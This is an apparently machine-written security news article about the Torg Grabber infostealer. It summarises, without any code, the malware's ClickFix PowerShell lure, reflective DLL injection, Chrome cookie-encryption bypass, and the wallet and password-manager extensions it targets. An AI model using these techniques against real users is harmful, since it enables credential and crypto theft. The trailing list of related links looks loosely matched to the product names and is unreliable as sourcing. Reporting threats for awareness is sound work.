Today's cybersecurity headlines are brought to you by ThreatPerspective
Ethical Hacking News

New Torg Grabber Malware Steals Sensitive Data from 850 Browser Extensions



New Torg Grabber is a highly sophisticated malware campaign that targets 850 browser extensions across multiple platforms, with over 728 of them specifically designed for cryptocurrency wallets. The malware steals sensitive data from these wallets and other storage solutions, including credentials, cookies, and autofill data. Gen Digital researchers have identified several anti-analysis mechanisms, multi-layered obfuscation, and uses direct syscalls and reflective loading for evasion, running the final payload entirely in memory.


  • Torg Grabber is a highly sophisticated malware campaign targeting cryptocurrency wallets and sensitive data storage solutions.
  • The malware uses the ClickFix technique to hijack the clipboard and trick users into executing a malicious PowerShell command.
  • Torg Grabber can steal credentials, cookies, and autofill data from cryptocurrency wallets and over 103 extensions for passwords, tokens, and authenticators.
  • The malware has added App-Bound Encryption (ABE) bypass to beat Chrome's cookie protection system.
  • Gen Digital warns that Torg Grabber continues to develop rapidly, with new C2 domains registered weekly.
  • Users and organizations must implement robust security measures, stay informed about emerging threats, and utilize reputable antivirus software to protect against Torg Grabber.



    • The cybersecurity landscape has recently been hit by a new and highly sophisticated malware campaign known as New Torg Grabber, which has been making headlines for its aggressive targeting of cryptocurrency wallets and other sensitive data storage solutions. According to researchers at Gen Digital, this malicious actor is actively developing the malware, with 334 unique samples compiled in just three months (between December 2025 and February 2026) and new command-and-control (C2) servers registered every week.

    The primary entry point for Torg Grabber is through the ClickFix technique, which involves hijacking the clipboard and tricking users into executing a malicious PowerShell command. Once inside, the malware injects a DLL reflectively into the browser to access Chrome’s COM Elevation Service and extract the master encryption key, a method also recently seen in VoidStealer. This allows it to bypass various security measures, including Chrome's cookie protection system.

    Torg Grabber targets 850 browser extensions across 25 Chromium-based browsers and 8 Firefox variants, with over 728 of them specifically designed for cryptocurrency wallets, covering "essentially every crypto wallet ever conceived by human optimism." The malware can steal credentials, cookies, and autofill data from these wallets, including popular names like MetaMask, Phantom, TrustWallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, Solflare.

    Apart from cryptocurrency wallets, Torg Grabber also targets a large list of 103 extensions for passwords, tokens, and authenticators: LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, ProtonPass, Enpass, Psono, Pleasant Password Server, heylogin, 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA. The malware can also profile the host, create a hardware fingerprint, document installed software (including 24 antivirus tools), take screenshots of the user’s desktop, and steal files from the Desktop/Documents folders.

    Furthermore, Torg Grabber has added App-Bound Encryption (ABE) bypass to beat Chrome’s (and Brave's, Edge's, Vivaldi's, and Opera's) cookie protection system, a method also recently seen in other information stealers. The malware features several anti-analysis mechanisms, multi-layered obfuscation, and uses direct syscalls and reflective loading for evasion, running the final payload entirely in memory.

    Gen Digital cautions that Torg Grabber continues to develop rapidly, registering new C2 domains weekly, and that its operator base is expanding, with 40 tags documented by the time of analysis. The researchers also discovered a standalone tool called Underground, which uses a similar approach but focuses more on extracting browser data.

    The recent development and deployment of New Torg Grabber highlight the evolving nature of malware threats in the digital landscape. As security measures become increasingly sophisticated, attackers continually adapt and innovate to stay ahead. It is crucial for users and organizations to remain vigilant and adopt proactive strategies to protect against such threats.

    In response to this new threat, cybersecurity professionals and individuals must be aware of the risks associated with New Torg Grabber and take immediate action to secure their systems and data. This includes implementing robust security measures, staying informed about emerging threats, and utilizing reputable antivirus software to detect and remove malware.

    Furthermore, users should exercise extreme caution when interacting with unfamiliar software or websites, avoiding suspicious links and attachments, and regularly updating their operating systems and applications to ensure they have the latest security patches.

    As the cybersecurity landscape continues to evolve, it is essential for individuals and organizations to remain proactive in protecting themselves against threats like New Torg Grabber. By staying informed, adopting robust security measures, and utilizing reputable antivirus software, users can significantly reduce their risk of falling victim to this or other similar malware campaigns.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/New-Torg-Grabber-Malware-Steals-Sensitive-Data-from-850-Browser-Extensions-ehn.shtml

  • https://www.bleepingcomputer.com/news/security/new-torg-grabber-infostealer-malware-targets-728-crypto-wallets/

  • https://www.coindesk.com/markets/2025/09/12/this-invisible-modstealer-is-targeting-your-browser-crypto-wallets

  • https://forklog.com/en/a-new-crypto-stealing-infostealer-a-10m-fbi-bounty-for-a-ukrainian-hacker-and-other-cybersecurity-news/

  • https://www.bleepingcomputer.com/news/security/voidstealer-malware-steals-chrome-master-key-via-debugger-trick/

  • https://hothardware.com/news/voidstealer-slips-past-chromes-defenses-rips-credentials

  • https://malwaretips.com/blogs/metamask-action-required-email-scam/

  • https://cybersecuritynews.com/metamask-users-targeted-with-phishing-emails/

  • https://thehackernews.com/2025/12/phantom-stealer-spread-by-iso-phishing.html

  • https://cybersecuritynews.com/phantom-stealer-attacking-users-to-steal-sensitive-data/

  • https://finance.yahoo.com/news/trust-wallet-hit-malicious-7m-084232843.html

  • https://malwaretips.com/blogs/trust-wallet-urgent-security-notice-scam/

  • https://www.binance.com/en/blog/security/646085240367972382

  • https://www.msn.com/en-us/news/technology/binance-logins-among-149-million-credentials-exposed-in-infostealer-malware-data-dump-here-s-what-you-should-know/ar-AA1V5tIK

  • https://www.pcrisk.com/removal-guides/28105-exodus-stealer

  • https://www.reddit.com/r/ExodusWallet/comments/1atq654/danger_exodus_stealer_malware_targetting_computers/

  • https://groups.google.com/a/chromium.org/g/chromium-extensions/c/VECmruG7MY4

  • https://www.scam-detector.com/validator/tronlink-com-review/

  • https://www.pcrisk.com/removal-guides/23423-ronin-wallet-pop-up-scam

  • https://www.bbc.com/news/technology-60933174

  • https://www.okx.com/help/how-do-i-protect-my-account-from-trojan-horse-takeovers

  • https://www.techflowpost.com/en-US/article/23887

  • https://www.scam-detector.com/validator/keplr-app-review/

  • https://theweal.com/2026/02/23/is-keplr-wallet-safe-uncover-the-truth-about-keplr-wallet-security/

  • https://www.pcrisk.com/removal-guides/33239-fake-rabby-wallet-website-scam

  • https://www.reddit.com/r/ethereum/comments/16t6xea/is_rabby_wallet_safe_to_use/

  • https://www.pcrisk.com/removal-guides/22450-solflare-scam

  • https://help.solflare.com/en/articles/9260258-how-did-i-get-hacked

  • https://www.tomsguide.com/computing/password-managers/millions-stolen-from-lastpass-users-in-massive-hack-attack-what-you-need-to-know

  • https://www.forbes.com/sites/daveywinder/2025/12/14/lastpass-data-breach---insufficient-security-exposed-16-million-users/

  • https://www.malwarebytes.com/blog/news/2025/10/phishers-target-1password-users-with-convincing-fake-breach-alert

  • https://1password.com/blog/local-threats-device-protections

  • https://cybersecuritynews.com/hackers-weaponize-keepass-password-manager/

  • https://keepass.info/help/kb/sec_issues.html

  • https://nordpass.com/have-i-been-hacked/

  • https://mashable.com/article/password-managers-cyberattacks-malware

  • https://support.dashlane.com/hc/en-us/sections/25643050214546-Dashlane-security-alerts-articles

  • https://www.upguard.com/security-report/dashlane-com

  • https://cyberpress.org/500-million-proton-vpn-pass-accounts-exposed/

  • https://cybernews.com/security/proton-pass-security-flaw/

  • https://nvd.nist.gov/vuln/detail/CVE-2024-9203

  • https://www.enpass.io/blog/security/enpass-password-manager-immune-to-mass-breaches/

  • https://psono.com/security

  • https://www.bitdefender.com/support/security-advisories/stored-xss-in-psono-client-via-malicious-vault-entry-urls/

  • https://nvd.nist.gov/vuln/detail/CVE-2023-27121

  • https://www.mdsec.co.uk/2023/09/the-not-so-pleasant-password-manager/

  • https://www.heylogin.com/en/security

  • https://www.ic3.gov/PSA/2026/PSA260320

  • https://www.scam-detector.com/validator/gauthmath-com-review/

  • https://blog.thefix.it.com/what-happened-to-the-gauth-app-the-truth-behind-the-2026-ban/

  • https://www.linkedin.com/pulse/hidden-vulnerabilities-totp-why-time-based-one-time-passwords-xqorf

  • https://www.bleepingcomputer.com/news/security/proton-fixes-authenticator-bug-leaking-totp-secrets-in-logs/


    • Published: Wed Mar 25 14:44:00 2026 by llama3.2 3B Q4_K_M


    © Ethical Hacking News . All rights reserved.

    Privacy | Terms of Use | Contact Us